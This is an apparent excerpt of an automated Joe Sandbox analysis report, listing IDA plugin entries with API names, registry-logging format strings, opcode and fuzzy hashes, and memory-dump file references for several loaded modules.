                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                                                                    • API String ID: 1001908780-3542721600
                                                                    • Opcode ID: ea89032756dacee166776ffae6fe81aad5936c2262cb6e165c1c53a0e3aac8bb
                                                                    • Instruction ID: 9063dea4df9634656364152e073e26f07248c9ee043e9d63e8c61509ce96efb0
                                                                    • Opcode Fuzzy Hash: ea89032756dacee166776ffae6fe81aad5936c2262cb6e165c1c53a0e3aac8bb
                                                                    • Instruction Fuzzy Hash: 01E09212A0CE16C9F5119B46B8001B96600AB607B5F0001B2EE2E6A6B6DE2CD9859308
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                                                                    • API String ID: 1001908780-3542721600
                                                                    • Opcode ID: 736e72fec16e77405d14e9c66c2c49a54fc340fafdf6bf8932278b63aaf1b47f
                                                                    • Instruction ID: fb37462a46331167796d9835f0a4adaadca4619b67523c6b2119781792dcef21
                                                                    • Opcode Fuzzy Hash: 736e72fec16e77405d14e9c66c2c49a54fc340fafdf6bf8932278b63aaf1b47f
                                                                    • Instruction Fuzzy Hash: 40E01A93A1C70681E572AF09BC001B92354EF91794F840136ED8E926B8DE2CEA89AB01
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
                                                                    • API String ID: 1001908780-1337547089
                                                                    • Opcode ID: 784c336f12923c52a9e57a2fe13529c35abaa978284f2e402610d2e187fa47d1
                                                                    • Instruction ID: e27199bf02ba69d979690466f52a396bd5881afff93c9da1cc98c67a1e8f57ac
                                                                    • Opcode Fuzzy Hash: 784c336f12923c52a9e57a2fe13529c35abaa978284f2e402610d2e187fa47d1
                                                                    • Instruction Fuzzy Hash: 00E04F62A1CE0681E7516B96FC402BD336DFF907E4F4401B9DD4E425B0AE6CEA89D300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
                                                                    • API String ID: 1001908780-1337547089
                                                                    • Opcode ID: 36385e915446ca97f37af8c8b7ca8d6c0f7bba0581d8162f54604cfa489c2086
                                                                    • Instruction ID: e09bf95502881bad9f9d3d05fb7c7e927ee34ac616a43819966ed5debf3e301f
                                                                    • Opcode Fuzzy Hash: 36385e915446ca97f37af8c8b7ca8d6c0f7bba0581d8162f54604cfa489c2086
                                                                    • Instruction Fuzzy Hash: 04E04F62A1CE0681E751AB96FC401BD336DFF907E8F4401B9DD4E426B0AE6CEA89D301
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
                                                                    • API String ID: 1001908780-1337547089
                                                                    • Opcode ID: a677593f49293dc8cb4a76836c6329c2e09004cd0ec74f1c5a474f2dbdc7842f
                                                                    • Instruction ID: 12bd50ad623405be97f1702f755577442fd534950801db5086378a8419e3581b
                                                                    • Opcode Fuzzy Hash: a677593f49293dc8cb4a76836c6329c2e09004cd0ec74f1c5a474f2dbdc7842f
                                                                    • Instruction Fuzzy Hash: 8BE04F66A1CE0681E751AB96FC401BD336DFF907E8F4401B9DD4E426B0AE6CEA85D301
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
                                                                    • API String ID: 1001908780-1337547089
                                                                    • Opcode ID: 62d9323b6c03070f9d9da292037cf0c85ec39e68ac9708cfa3f9b38eb96afc76
                                                                    • Instruction ID: 0bb9122b2244956c8d4d6c81dd4446f6b0c2df8f63e23c730a346ccb9ee73ae5
                                                                    • Opcode Fuzzy Hash: 62d9323b6c03070f9d9da292037cf0c85ec39e68ac9708cfa3f9b38eb96afc76
                                                                    • Instruction Fuzzy Hash: 5CE04F62A1CE0681E751AB96FC401BD736DFF907E8F4401B9DD4E826B0AE6CEA85D301
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
                                                                    • API String ID: 1001908780-1337547089
                                                                    • Opcode ID: 1c07fbf2c4e1f608a8164a2e6e0a5dad0009d04c9ecbbd7e3252efda15aaeace
                                                                    • Instruction ID: 5b0c5bfac285029825e19f85dc623c73a645d383dd0881fafdc8c01e368d9af7
                                                                    • Opcode Fuzzy Hash: 1c07fbf2c4e1f608a8164a2e6e0a5dad0009d04c9ecbbd7e3252efda15aaeace
                                                                    • Instruction Fuzzy Hash: 23E04F62A1CE0A81E751AB96FC401BD336DFF907E8F4401B9DD4E426B1AE6CEA85D301
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
                                                                    • API String ID: 1001908780-1337547089
                                                                    • Opcode ID: 4b431bc60d81371c458d6948ff5b4065c7745a213b89ab18d77d76538e87061d
                                                                    • Instruction ID: 76b64d619b6309555721ddf0cd190c7435df2f209a4c628e5b609d05967ff77b
                                                                    • Opcode Fuzzy Hash: 4b431bc60d81371c458d6948ff5b4065c7745a213b89ab18d77d76538e87061d
                                                                    • Instruction Fuzzy Hash: A7E01A61A0CE0AC9E510AB56FC001BD2614FBA07B4F4441B5DE6F6A6B2DE2CE9999308
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
                                                                    • API String ID: 1001908780-1337547089
                                                                    • Opcode ID: 2701b3d6a9ab9bbf95a547988e9a3aa90bcac870f82cf6104b82374a091489e9
                                                                    • Instruction ID: 52bb516d4a49db91bc3f2adc010ad553731049a416afe12190a41b47865b9c8d
                                                                    • Opcode Fuzzy Hash: 2701b3d6a9ab9bbf95a547988e9a3aa90bcac870f82cf6104b82374a091489e9
                                                                    • Instruction Fuzzy Hash: 02E04851A0CE06C9F511EB56FC001BD2614FFA07B4F4441B5DD6F67672DE2CD5959308
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
                                                                    • API String ID: 1001908780-1337547089
                                                                    • Opcode ID: 87b6c94d0ed7976fff14a7d71f92632dcef419059c189e4e18e4384b6916525e
                                                                    • Instruction ID: 05afc105acb2a7ffdcb2c2f3867743b1224ab139caf225a7f77e48cc8f81f123
                                                                    • Opcode Fuzzy Hash: 87b6c94d0ed7976fff14a7d71f92632dcef419059c189e4e18e4384b6916525e
                                                                    • Instruction Fuzzy Hash: A3E04851A0CE06C9F510EB56FC001BD6614FFA07B4F4441B5DD6F67672DE2CD5959308
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
                                                                    • API String ID: 1001908780-1337547089
                                                                    • Opcode ID: 66301cae53ed6fb6f16d0c6ae6d16061bb5fa13e113b6ba7e4e88adf1e5741c8
                                                                    • Instruction ID: c4cbbcb5167ebd16e20b35589be7784f7af5a6ea5380ff74ae0f23685566ff4c
                                                                    • Opcode Fuzzy Hash: 66301cae53ed6fb6f16d0c6ae6d16061bb5fa13e113b6ba7e4e88adf1e5741c8
                                                                    • Instruction Fuzzy Hash: 29E01A61A0CE0AC9E510AB56BC001BD2614FBA07B5F4441B5DE6E6A6B2DE2CE9959208
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
                                                                    • API String ID: 1001908780-1337547089
                                                                    • Opcode ID: d9df53aad19027ec51dc863d790e8a0bc8c701a7099ce9e4ddea8cecc354396c
                                                                    • Instruction ID: b1e8c65eb8d7b67b87db75e00d270adc17de741341ae469ab5fbc8d2d6b25e33
                                                                    • Opcode Fuzzy Hash: d9df53aad19027ec51dc863d790e8a0bc8c701a7099ce9e4ddea8cecc354396c
                                                                    • Instruction Fuzzy Hash: 95E04F61A0CE0AC9F510AB56FC002BD2614FFA07B4F4441B5DE6E6B6B2DE2CE5999308
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: strcmp
                                                                    • String ID:
                                                                    • API String ID: 1004003707-0
                                                                    • Opcode ID: 23f4059f3eec6cc7d22a5bfeff849bc8b5d19bf497d60b10d2290aa525ec140d
                                                                    • Instruction ID: ebc1d4ae55fc49fe34f1a85a0ce1953dd731c25e80dc48cd4afa26a64d8c7bf5
                                                                    • Opcode Fuzzy Hash: 23f4059f3eec6cc7d22a5bfeff849bc8b5d19bf497d60b10d2290aa525ec140d
                                                                    • Instruction Fuzzy Hash: BE212A95F0DE468AFB695C938580B7E5199AF08BE0E1C40B9CE0D4B7F6DE5CE8819341